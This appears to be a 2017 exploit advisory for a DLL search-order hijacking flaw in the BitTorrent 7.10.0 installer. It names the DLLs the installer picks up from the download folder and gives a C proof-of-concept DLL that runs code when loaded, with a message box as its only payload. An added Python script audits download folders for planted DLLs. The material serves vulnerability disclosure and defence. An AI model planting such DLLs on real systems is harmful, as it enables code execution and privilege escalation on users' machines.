Bittorrent 7.10.0 (Build 43581) Installer DLL Hijacking



EKU-ID: 6818 CVE: OSVDB-ID:
Author: Rithwik Jayasimha Published: 2017-08-01 Verified: Verified


# Exploit Title: Bittorrent 7.10.0 (Build 43581) Installer DLL Search Order Hijack - "WININET.dll", "DNSAPI.dll", others
# Date of Discovery: July 21 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Bittorrent Inc.
# Vendor Homepage: https://www.bittorrent.com
# Software Link: http://download-new.utorrent.com/endpoint/bittorrent/os/windows/track/stable/
# Affected Versions: <=7.10.0.43581
# Tested on: Windows 10, 8.1 x64
# Category: local
# Vulnerability type: Local Privilege Escalation/Code Execution


# Description:


	The installer for Bittorrent versions <=7.10.0 Build 43581 automatically searches for "WININET.dll", "DNSAPI.dll", "MSIMG32.dll", "CRYPTSP.dll", "bcrypt.dll" and "PHLPAPI.dll",
	among others, in the location the installer was downloaded to.
	An attacker who can create files with these names in that directory can have them loaded and run when the installer is executed
	(code execution, local privilege escalation). For example:
			C:\Users\<username>\Downloads\WININET.dll
			C:\Users\<username>\Downloads\msls31.dll
			C:\Users\<username>\Downloads\USP10.dll
			C:\Users\<username>\Downloads\CRYPTSP.dll
			C:\Users\<username>\Downloads\bcrypt.dll
			C:\Users\<username>\Downloads\PHLPAPI.dll
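
Added example (not part of the original advisory or its author's code): a Python check a defender could run over a download folder before launching an installer from it. It flags DLLs whose names appear in this advisory or match a file in the system directory, and it generalizes to any other DLL found there; the function names and the files created in demo() are constructed for illustration.

```python
import os
import tempfile

# DLL names given in this advisory; Windows file names compare case-insensitively.
ADVISORY_DLLS = frozenset(n.lower() for n in (
    "WININET.dll", "DNSAPI.dll", "MSIMG32.dll", "CRYPTSP.dll",
    "bcrypt.dll", "PHLPAPI.dll", "msls31.dll", "USP10.dll"))

def audit_directory(path, system_dir=None, known=ADVISORY_DLLS):
    """Return sorted (file name, reason) pairs for DLLs directly inside `path`.

    Only the top level is inspected: an executable's application directory is
    the folder it sits in, not that folder's subdirectories.
    """
    system_names = set()
    if system_dir and os.path.isdir(system_dir):
        system_names = {n.lower() for n in os.listdir(system_dir)}
    findings = []
    with os.scandir(path) as it:
        for entry in it:
            name = entry.name.lower()
            if not entry.is_file() or not name.endswith(".dll"):
                continue
            if name in known:
                reason = "listed in advisory"
            elif name in system_names:
                reason = "shadows a system DLL"
            else:
                reason = "unexpected DLL in download folder"
            findings.append((entry.name, reason))
    return sorted(findings, key=lambda f: f[0].lower())

def demo():
    """Audit a constructed download folder against a constructed system folder."""
    with tempfile.TemporaryDirectory() as root:
        downloads = os.path.join(root, "Downloads")
        system32 = os.path.join(root, "System32")
        os.makedirs(downloads)
        os.makedirs(system32)
        for fn in ("bittorrent.exe", "WinINet.DLL", "version.dll", "helper.dll"):
            open(os.path.join(downloads, fn), "wb").close()
        for fn in ("wininet.dll", "VERSION.dll"):
            open(os.path.join(system32, fn), "wb").close()
        return audit_directory(downloads, system32)

if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

On a real system, pass the user's download folder as `path` and the Windows system directory as `system_dir`.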


# Proof Of Concept:
	1. Compile the code below as a DLL, place it in the vulnerable location and run bittorrent.exe

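		#include <windows.h>
		#define DllExport __declspec (dllexport)

		/* Declared before DllMain so the call below compiles. */
		int dll_hijack(void);

		/* Entry point the loader calls when the DLL is mapped into the process. */
		BOOL WINAPI  DllMain (
		            HINSTANCE hinstDLL,
		            DWORD     fdwReason,
		            LPVOID    lpvReserved)
		{
		  dll_hijack();
		  return 0;
		}

		/* Harmless marker: shows a message box to prove the DLL was loaded. */
		int dll_hijack(void)
		{
		  MessageBoxA(0, "Bittorrent 7.10.0.43581 DLL Hijacking PoC", "DLL Message", MB_OK);
		  return 0;
		}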

# Additional Notes, References and links:

# Disclosure Timeline:
    This issue was remedied in BitTorrent 7.10.0 For Windows (build 43917)